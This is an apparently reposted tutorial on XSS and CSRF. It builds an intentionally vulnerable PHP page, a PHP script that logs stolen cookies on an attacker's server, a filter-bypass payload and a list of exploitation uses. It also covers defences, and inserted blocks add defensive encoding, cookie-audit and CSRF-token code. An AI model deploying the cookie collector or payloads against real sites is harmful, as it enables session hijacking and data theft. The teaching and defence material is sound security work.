ToB企服应用市场: ToB evaluation and business social-networking industry platform

Title: XSS in practice

Author: 嚴華    Time: 2022-10-25 23:24

I. How XSS vulnerabilities work

1. What is an XSS vulnerability?

Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same-origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, carry out any action that the user is able to perform, and access any of the user's data. If the victim user has privileged access within the application, the attacker may be able to gain full control over all of the application's functionality and data.
2. Categories of XSS

1) Reflected XSS

Reflected XSS is the simplest variety of cross-site scripting. It arises when an application receives data in an HTTP request and includes that data in the immediate response in an unsafe way.
If a user visits a URL constructed by the attacker, the attacker's script executes in the user's browser, in the context of that user's session with the application. At that point the script can carry out any action, and retrieve any data, to which the user has access.

2) Stored XSS

Stored cross-site scripting arises when an application receives data from an untrusted source and includes that data in its later HTTP responses in an unsafe way.
Difference between reflected XSS and stored XSS

The key difference between reflected XSS and stored XSS is that a stored XSS vulnerability results in attacks that are self-contained within the application itself. The attacker does not need to find an external way of inducing other users to make a particular request containing the exploit. Instead, the attacker places the exploit into the application itself and simply waits for users to encounter it.

3) DOM-based XSS

DOM-based XSS vulnerabilities usually arise when JavaScript takes data from an attacker-controllable source, such as the URL, and passes it to a sink that supports dynamic code execution, such as eval() or innerHTML. This enables attackers to execute malicious JavaScript, which typically allows them to hijack other users' accounts.
To deliver a DOM-based XSS attack, you need to place data into a source so that it is propagated to a sink and causes execution of arbitrary JavaScript.
The most common source for DOM XSS is the URL, which is typically accessed through the window.location object. An attacker can construct a link that sends a victim to a vulnerable page with a payload in the query string and fragment portions of the URL. In certain circumstances, such as when targeting a 404 page or a website running PHP, the payload can also be placed in the path.

II. XSS in practice

1. Write a page that contains an XSS vulnerability
  <!DOCTYPE html><html>
  <head>
  <meta http-equiv="content-type" content="text/html;charset=utf-8">
  <title>欢迎来到level1</title>
  </head>
  <body>
  <h1 align=center>欢迎来到level1</h1>
  <?php
  ini_set("display_errors", 0);                    // do not display error reports
  $str = $_GET["name"];                            // read the incoming parameter
  echo "<h2 align=center>欢迎用户".$str."</h2>";   // whatever the user enters is output as-is
  ?>
  <center><img src=level1.png></center>
  <?php
  echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
  ?>
  </body>
  </html>
The two lines that matter are:

  $str = $_GET["name"];                            // read the incoming parameter
  echo "<h2 align=center>欢迎用户".$str."</h2>";   // whatever the user enters is output as-is

The code performs no check on the user input at all; it is written straight into the page, so the page is vulnerable to XSS.
Test:

A payload such as the following can be constructed:
/level1.php?name=
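As an added example that is not part of the original post, the following JavaScript rewrites the level1.php echo in its vulnerable form and in a fixed form that HTML-encodes the name parameter before it is written into the page (the equivalent of PHP's htmlspecialchars with ENT_QUOTES, or of writing to textContent instead of the innerHTML sink named in the DOM-based XSS section). It also implements the reflection check used when looking for XSS: send a unique marker surrounded by the characters an injection needs and see which of them come back unencoded. The function names, the marker value and the probe set are choices made here, not anything from the post.

```javascript
// Added example, not code from the original post. The render functions stand in
// for the server: they take the "name" parameter and return the HTML the page
// would send back, so the probe can be run offline.

// Encode the five characters that matter in HTML text and attribute contexts.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: mirrors  echo "<h2 align=center>欢迎用户".$str."</h2>";
function renderGreetingVulnerable(name) {
  return `<h2 align=center>欢迎用户${name}</h2>`;
}

// Fixed: the parameter is encoded for the HTML text context it lands in.
function renderGreetingSafe(name) {
  return `<h2 align=center>欢迎用户${escapeHtml(name)}</h2>`;
}

// Characters an injection into HTML needs. Each one is probed separately so
// that an encoded neighbour (e.g. "&lt;") cannot be mistaken for a raw one.
const SPECIALS = ['<', '>', '"', "'", '&'];

// Send marker+char+marker through the page for each character and report the
// characters that come back verbatim. An empty list means the output is encoded;
// null-free behaviour: a page that does not reflect the marker at all yields [].
function probeReflection(render, marker) {
  const unencoded = [];
  for (const c of SPECIALS) {
    const probe = `${marker}${c}${marker}`;
    if (render(probe).includes(probe)) unencoded.push(c);
  }
  return unencoded;
}

// Constructed canary marker: short, unlikely to occur naturally in a response.
const MARKER = 'zq7x';

console.log(probeReflection(renderGreetingVulnerable, MARKER)); // all five survive
console.log(probeReflection(renderGreetingSafe, MARKER));       // []
```

In a real test the render function is replaced by an HTTP request to the page with the probe in the name parameter, and the characters that survive tell you which contexts are reachable: an unencoded `<` and `>` allow a new tag, an unencoded `"` or `'` allows breaking out of an attribute value.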



2. Using XSS to obtain the current user's cookie

Test whether a popup appears

Write a script that collects the cookie and place it on your own server; its contents are as follows
  <?php
  $cookie = $_GET['cookie'];              // value of the cookie query parameter
  $ip = getenv ('REMOTE_ADDR');           // address of the client that made the request
  $time = date('Y-m-d g:i:s');
  $fp = fopen("cookie.txt","a");          // append one record per request to cookie.txt
  fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  fclose($fp);
  ?>
Construct the payload

A length limit was found; change the length in the front end


Accessed from another host; our own server received the cookie
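The cookie theft above works because the injected script can read the session cookie through document.cookie. As an added example (not part of the original post), the following JavaScript audits a Set-Cookie header for the attributes that limit what such a script can reach: HttpOnly (the cookie is not exposed to script), Secure (not sent over plaintext HTTP) and SameSite (not attached to cross-site requests). PHPSESSID is the default session cookie name in PHP; the cookie value and header strings are constructed samples, and the function names are choices made here.

```javascript
// Added example, not code from the original post. Audits one Set-Cookie header
// and builds a hardened one. Sample cookie values below are constructed.

// Parse "name=value; Attr; Attr=val" into { name, value, attrs }.
// Attribute names are lower-cased because they are case-insensitive.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const [name, ...rest] = parts[0].split('=');
  const attrs = {};
  for (const part of parts.slice(1)) {
    const eq = part.indexOf('=');
    const key = (eq === -1 ? part : part.slice(0, eq)).toLowerCase();
    attrs[key] = eq === -1 ? true : part.slice(eq + 1).trim();
  }
  return { name: name.trim(), value: rest.join('='), attrs };
}

// Return a list of findings; an empty list means the cookie carries the
// attributes we want on a session cookie.
function auditSessionCookie(header) {
  const { attrs } = parseSetCookie(header);
  const findings = [];
  if (!('httponly' in attrs)) findings.push('missing HttpOnly: readable through document.cookie');
  if (!('secure' in attrs)) findings.push('missing Secure: may be sent over plaintext HTTP');
  const sameSite = typeof attrs.samesite === 'string' ? attrs.samesite.toLowerCase() : null;
  if (sameSite === null) findings.push('missing SameSite: browser default applies');
  else if (sameSite === 'none') findings.push('SameSite=None: attached to cross-site requests');
  return findings;
}

// Build a session cookie header with the attributes set.
function buildSessionCookie(name, value) {
  return `${name}=${value}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed sample headers: one as a default PHP setup might emit it,
// one hardened.
const WEAK_HEADER = 'PHPSESSID=abc123def456; Path=/';
const HARDENED_HEADER = buildSessionCookie('PHPSESSID', 'abc123def456');

console.log(auditSessionCookie(WEAK_HEADER));      // three findings
console.log(auditSessionCookie(HARDENED_HEADER));  // []
```

HttpOnly removes the cookie from what an XSS payload can read, but not what it can do: script running in the victim's origin can still issue requests that carry the cookie automatically, so output encoding on the vulnerable page remains the primary fix and the cookie attributes are defence in depth.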

III. XSS testing and exploitation

1. Finding XSS

a. Steps

b. Examples:

(1) Suppose the returned response contains the following script

Test approach:
1. Terminate the input tag and construct a script: ">
2. Add an event handler inside the input tag: "
(2) Suppose the returned response contains the following script
Test approach:
(3) Suppose the returned response contains the following script:
click here…

Test approach:
1. Use a pseudo-protocol: javascript:alert(1)
2. Use an event handler: #
c. Probing the defences

Common defences are of the following kinds:
d. Bypass

If a firewall is filtering, remove different parts of the string in turn to determine which tag is being blocked, then bypass it
Several bypasses are summarized below:
[img]http://dis.qidao123.com/vaild.gif onreadystatechange=alert(1)[/img]
2. XSS exploitation

1. Phishing, including harvesting all kinds of user accounts
2. Stealing users' cookies to obtain their private information, or using the user's identity to perform further actions on the site;
3. Hijacking the user's (browser) session to perform arbitrary actions, such as illegal transfers, forced posting of entries, emails, etc.
4. Forcing advertising pages to pop up, inflating traffic, etc.
5. Planting malware on web pages;
6. Performing malicious actions, such as arbitrarily tampering with page content, deleting articles, etc.
7. Carrying out large-scale client-side attacks, such as DDoS
8. Obtaining client information, such as the user's browsing history, real IP, open ports, etc.
9. Controlling the victim's machine to launch attacks against other sites;
10. Combining with other vulnerabilities, such as CSRF, to cause further harm;
11. Escalating user privileges, including further penetration of the site
12. Spreading cross-site scripting worms, etc.
IV. Defence

1. HTML entity encoding

htmlspecialchars(): converts the input content into HTML entities

Character    HTML entity
"            &quot;
'            &apos;
&            &amp;
<            &lt;
>            &gt;
2. Input filtering

Validate the data users submit effectively: accept only content within the specified length range and in the appropriate format, and block or ignore any other data.
3. Setting HttpOnly

XSS typically uses a JS script to read the cookie in the user's browser. If the server sets the HttpOnly attribute on the cookie, JS scripts can no longer read it, yet the browser can still use the cookie normally.

Cookies are normally obtained from the document object. Browsers today generally accept a parameter called HttpOnly when a cookie is set, just like domain and the other parameters. Once HttpOnly is set, the cookie is no longer visible in the browser's document object, while browsing is unaffected, because the cookie is still placed in the request headers and sent (including during Ajax requests). Applications generally do not manipulate these sensitive cookies in JS anyway, so we set HttpOnly on sensitive cookies and leave it off for cookies the application needs to manipulate with JS; this secures the cookie information while keeping the application working.
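An added example, not the article's own code, showing level1.php with the three defences of this section applied together (entity-encoding the output, validating the input, and HttpOnly on the session cookie); the extra cookie flags and the accepted name format are assumptions:

```php
<?php
// Added example, not the tutorial's code: level1.php hardened with the three
// defences of section IV. Cookie flags other than HttpOnly are assumptions.

// 3. HttpOnly on the session cookie: document.cookie can no longer read it,
//    but the browser still sends it in the Cookie header (Ajax included).
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,   // assumption: the site is served over HTTPS
    'samesite' => 'Lax',  // also limits cross-site sending (helps against CSRF)
]);
session_start();

// 2. Input filtering: accept only a name of the expected shape and length.
function validate_name(string $raw): ?string
{
    // letters, digits and underscore (any script), 1 to 20 characters
    return preg_match('/^[\p{L}\p{N}_]{1,20}$/u', $raw) === 1 ? $raw : null;
}

// 1. HTML entity encoding for everything echoed into the HTML body.
function h(string $s): string
{
    // ENT_QUOTES also encodes ', so a value cannot break out of a quoted attribute;
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$name = validate_name($_GET['name'] ?? '');

// Original, vulnerable:   echo "欢迎用户" . $_GET["name"];
if ($name === null) {
    http_response_code(400);
    echo "无效的用户名";          // reject; never echo the rejected value back
} else {
    echo "欢迎用户" . h($name);  // a "> from the payload would come out as &quot;&gt;
}
```

Validation alone is not enough for fields that legitimately contain quotes or angle brackets, which is why the output is still encoded even after the name passes the check.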
V. CSRF principle and exploitation

1. CSRF principle and exploitation

Principle:
Cross-site request forgery, put simply, is an attacker using some technical means to trick the user's browser into visiting a site the user has previously authenticated to and performing some actions there (sending mail, sending messages, even financial actions such as transfers or purchases). Because the browser was previously authenticated, the visited site treats the request as a genuine user action and executes it. This exploits a weakness in web user authentication: simple authentication only guarantees that a request came from a certain user's browser, not that the user sent the request willingly.
Scenario:
1. User C opens a browser, visits trusted site A, and enters a username and password to log in to site A;
2. After the user's credentials are verified, site A generates cookie information and returns it to the browser; user C is now logged in to site A and can send requests to it normally;
3. Before logging out of site A, the user opens another tab in the same browser and visits site B;
4. After receiving the user's request, site B returns some attack code and issues a request to the third-party site A;
5. On receiving this attack code, the browser, following site B's request and without the user's knowledge, sends a request to site A carrying the cookie information. Site A does not know the request was actually initiated by B, so it processes it with C's privileges according to C's cookie, and the malicious code from site B is executed.
Detection:
1. Detecting CSRF vulnerabilities is fairly tedious work. The simplest method is to capture a normal request, remove the Referer field, and resubmit it; if the submission still succeeds, a CSRF vulnerability can basically be confirmed.
2. As research into CSRF has deepened, tools dedicated to CSRF detection have emerged, such as CSRFTester and CSRF Request Builder.
3. Use Burp's built-in CSRF PoC generator to modify the captured request, then run the test in the browser.
Defence:
1. Verify the HTTP Referer field;
2. Add a token to the request and verify it;
The client sends the user's username and password to the server, which validates them; on success it generates a token and sends it to the client, which stores it itself. Subsequent requests must carry the token in the HTTP request header when accessing the server, where it is compared against the token stored on the server.

3. Add a custom attribute in the HTTP header and verify it.
Difference between CSRF and XSS: the biggest difference is that CSRF does not steal the user's cookie; it directly uses the browser's cookie to make the user perform some action.
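As an added example (not the article's own code), the token defence from points 2 and 3 above implemented in PHP, with the token accepted either as a form field or as a custom request header; the form action, field names and header name are assumptions:

```php
<?php
// Added example, not the page's own code: the token defence from section V.
// Form action "/transfer.php", field "amount" and header "X-CSRF-Token" are assumptions.
session_start();

// Issue one random token per session and keep it server-side.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));  // 256 bits from the CSPRNG
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token with the stored one in constant time.
function csrf_check($submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && is_string($submitted) && hash_equals($expected, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Token may arrive as a form field (defence 2) or as a custom header (defence 3);
    // PHP exposes the X-CSRF-Token header as HTTP_X_CSRF_TOKEN.
    $submitted = $_POST['csrf_token'] ?? $_SERVER['HTTP_X_CSRF_TOKEN'] ?? null;
    if (!csrf_check($submitted)) {
        http_response_code(403);
        exit('CSRF token invalid');   // a request forged from site B cannot supply it
    }
    // ... perform the state-changing action (transfer, etc.) here ...
    exit('ok');
}

// GET: render the form with the token embedded. Only same-origin pages can read it,
// which is what stops site B from including it in a forged request.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo '<form method="post" action="/transfer.php">'
   . '<input type="hidden" name="csrf_token" value="' . $token . '">'
   . '<input name="amount"><button>Transfer</button></form>';
```

The token check must happen before the action, and because the session cookie still travels with the forged request, the session alone never substitutes for the token.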
Various function points
Source: http://www.cnblogs.com/-xiaopeng1/ The copyright of this article is shared by the author and cnblogs. Reposting is welcome but must include a link to the original and keep this statement; otherwise the right to pursue legal liability is reserved.